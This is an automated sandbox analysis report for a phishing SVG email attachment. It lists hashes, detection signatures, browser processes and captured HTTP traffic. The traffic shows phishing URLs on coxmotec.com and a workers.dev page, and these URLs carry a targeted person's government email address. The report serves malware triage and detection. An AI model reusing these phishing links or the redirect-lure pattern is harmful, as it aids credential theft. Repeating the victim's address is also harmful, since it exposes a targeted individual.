Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecureMessageatt.svg

Overview

General Information

Sample name:SecureMessageatt.svg
Analysis ID:1635687
MD5:f95865d146dfa390b355d84b7a64273a
SHA1:47f92e698ce0719378d554b290c0c435f4ebcb3d
SHA256:c0e499456fb4736c459254db42dafee1f67c3906453652872eac62918785007b
Infos:

Detection

Phisher
Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Phisher
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\SecureMessageatt.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1856 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 2344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=6032 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecureMessageatt.svgJoeSecurity_Phisher_2Yara detected PhisherJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-11T22:18:51.082329+010028032742Potentially Bad Traffic192.168.2.449711104.26.12.205443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://coxmotec.com/wp-includes/js/emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg==Avira URL Cloud: Label: phishing

    Phishing

    barindex
    Yara detected Phisher
    Source: Yara matchFile source: SecureMessageatt.svg, type: SAMPLE
    AI detected suspicious Javascript
    Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://coxmotec.com/wp-includes/js/emFjaGFyeS5hZG... The script demonstrates high-risk behavior by redirecting the user to an untrusted domain, which is a common technique used in phishing attacks to steal sensitive information like user credentials.
    Source: 1.13.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: ... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that collects user data and potentially redirects to a suspicious domain. The script also attempts to hide its true purpose through heavy obfuscation, which is a common tactic used in malware. Overall, this script demonstrates a high level of risk and should be treated with caution.
    Source: 1.97.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: ... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be a malicious script designed to collect sensitive user information and potentially execute further malicious actions.
    Source: file:///C:/Users/user/Desktop/SecureMessageatt.svgHTTP Parser: No favicon
    Source: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/?qrc=zachary.adkins@rrc.texas.govHTTP Parser: No favicon
    Source: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/?qrc=zachary.adkins@rrc.texas.govHTTP Parser: No favicon
    Source: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/?qrc=zachary.adkins@rrc.texas.govHTTP Parser: No favicon
    Source: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/?qrc=zachary.adkins@rrc.texas.govHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49711 -> 104.26.12.205:443
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxContent-Type: application/pkix-certLast-Modified: Wed, 01 May 2024 21:14:13 GMTETag: "6632b0a5-509"Content-Disposition: attachment; filename="R10.der"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1245Cache-Control: max-age=3600Expires: Tue, 11 Mar 2025 22:20:53 GMTDate: Tue, 11 Mar 2025 21:20:53 GMTConnection: keep-aliveData Raw: 1f 8b 08 00 00 00 00 00 00 00 33 68 62 65 35 68 62 7a bb 80 99 89 91 89 49 c0 7b 45 d0 e4 ef b3 f4 17 15 b3 79 af 60 e9 2d bd 60 c0 cb c6 a9 d5 e6 d1 f6 9d 97 91 91 9b 95 c1 c0 df 90 db 80 93 8d 39 94 85 4d 98 29 34 d8 50 d3 40 1d c4 e1 12 56 f0 cc 2b 49 2d ca 4b 2d 51 08 4e 4d 2e 2d ca 2c a9 54 08 4a 2d 4e 4d 2c 4a ce 50 70 2f ca 2f 2d 30 14 35 10 06 29 65 16 e6 f1 0c 0e 72 57 08 ca cf 2f 51 88 30 34 90 13 e7 35 32 31 30 36 34 36 00 83 28 20 d7 1c c8 35 32 32 36 b5 34 b5 8c 02 32 51 2c 14 33 10 81 58 c8 eb 93 5a a2 5e ac e0 9a 97 5c 54 59 50 62 c8 63 c0 05 31 9d 39 c8 d0 c0 a0 89 51 09 d9 e1 8c ac 0c cc 4d 8c fc 0c 40 71 2e a6 26 46 46 86 f3 e1 4f 9f 1d 09 11 7a bb c5 fd df 49 f5 88 32 b7 00 8d 1e 59 bb 8e fb ac 73 af 6e 95 d0 dc 7b 77 6b d4 fe 5f df ce 2d de b7 9e 41 d1 3b 29 2a ca 86 51 ff 68 04 f3 b7 ce ff 7d 82 ce af 0f 6e 7d 20 c2 3e ad 3f 5f fe fa f3 5d 8d 96 9c a5 a9 db 0f ad 97 88 36 57 d3 78 be f8 0b bb 76 ae d4 ff d5 11 7b a6 ae 73 f8 ff f2 74 f8 91 ad d1 f5 15 bc 12 89 7b c4 9f 87 1c db ed 39 f1 6c 9e c4 c5 86 d6 77 cb 52 cd f6 94 bc da 13 e0 f3 ea 8f e2 67 0b b1 c9 53 76 6d b8 9c 6d c1 76 56 4c a8 ea 54 50 e9 89 b5 65 9b 0e cd 89 9d e1 1a 93 9f 58 7d 4c f7 9d 8d 70 50 1b e3 cd f0 67 16 32 f7 7b b7 ca 4f 9a 38 eb b9 97 cc 19 d7 15 45 a1 1f 36 3c 5b cc fe e6 ef 72 e9 b4 79 f6 1e dd 85 2d 85 11 27 ad 7e bd 8f fb 14 ed a2 6d 53 f2 bc 7f 93 fb 41 f6 ac b3 b3 b6 f3 4e fb 2e d4 a8 16 18 c2 f5 26 f1 db f7 af 8f 3e 75 9d 98 ca db cb c4 cc c8 c0 b8 b8 f1 87 41 e3 57 03 3e 60 b8 c9 f2 33 32 fe 67 61 01 26 81 36 03 59 10 5f 95 05 14 d0 1c da 6c 8c ac ac ec cc 4c 70 16 a3 81 10 48 5a 18 a4 9c c3 80 0d 48 31 31 32 40 b4 f0 b1 88 b1 88 ec de 73 d8 7d e9 93 3d 2b 8f 1d 5e 52 c4 23 d0 bb c8 f4 e1 89 17 06 f2 20 69 65 16 09 03 b1 06 91 ca 2d 91 cf aa b7 3d 7d c2 58 dc c0 d1 71 42 2a e2 db cb d9 79 06 46 30 f3 19 19 59 d4 0c 54 0c 94 60 7c 03 a6 36 b1 8c 92 92 02 2b 7d fd 0a 43 bd 4c bd 9c 54 60 74 eb e5 17 a5 eb 83 13 93 ac 02 0b 30 de 0d 38 d8 d8 d2 1b 79 18 99 18 c1 89 51 56 9e 45 c1 40 ce 40 66 81 d4 02 09 64 dd c9 c8 ba 51 53 35 73 13 d0 17 93 36 3e 77 34 7f 5d 39 b7 f1 d9 d9 47 aa 0f ad 14 5e 4e 70 99 ba b8 31 e6 fc e1 d8 bf 7b 17 14 5c dd 38 4d 43 89 fb d2 27 8d f3 3c cf af 3c 73 ee 51 51 92 3d e8 34 e9 22 e7 fa f9 de 5f 4e 14 f8 2b 88 6d 8c ba cb f8 4d fe 87 7c 62 b6 88 fa 86 a2 de e4 75 ef 1e 9d f3 3e 6f 7e 77 f7 e2 2b 67 9f af 0d 58 bb 77 ff e3 37 76 49 66 05 33 0d 97 bf e8 bd fb 2a e9 91 d0 ba af 73 ae d8 ea f0 ac ba 30 Data Ascii: 3hbe5hbzI{Ey`-`9M)4P@V+I-K-QNM.-
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: AutoItHost: api.ipify.orgCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: AutoItHost: api.ipify.org
    Source: global trafficHTTP traffic detected: GET /api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/64.64.116.7 HTTP/1.1User-Agent: AutoItHost: ipqualityscore.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg== HTTP/1.1Host: coxmotec.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ee16efd9062312&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee16efd9062312/1741727967275/Hy7jn623z7dvMWW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee16efd9062312/1741727967275/Hy7jn623z7dvMWW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91ee16efd9062312/1741727967282/97f74a26ba1df846f6db44673f65a92e55591ba758862141c65a2a81484c6ffa/o483X2mSdMhBgPM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ee181ead84c325&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1328512358:1741724051:vf1wI2YD3_-ZdiO3ZmTkutZy2y0blo3rBlvEFk-0m3g/91ee181ead84c325/Xw32iByo_ezluBxHyRXc0QK7bjck2tPSI_mAE8VhREk-1741728010-1.1.1.1-w6NOyNk8aX1JiR9HaL66PXzHjq7iF8zqVbJjWUwREc2bLYIYz1C9DYWTNGibcoJd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91ee181ead84c325/1741728016086/61f3f0d669fc0bc17cb7802234e7bad3471c18a83b55f1b6d8ed3a743ebdae20/F1StGA_mYnnvtZ4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee181ead84c325/1741728016090/AsWFfXZs9BwJng8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
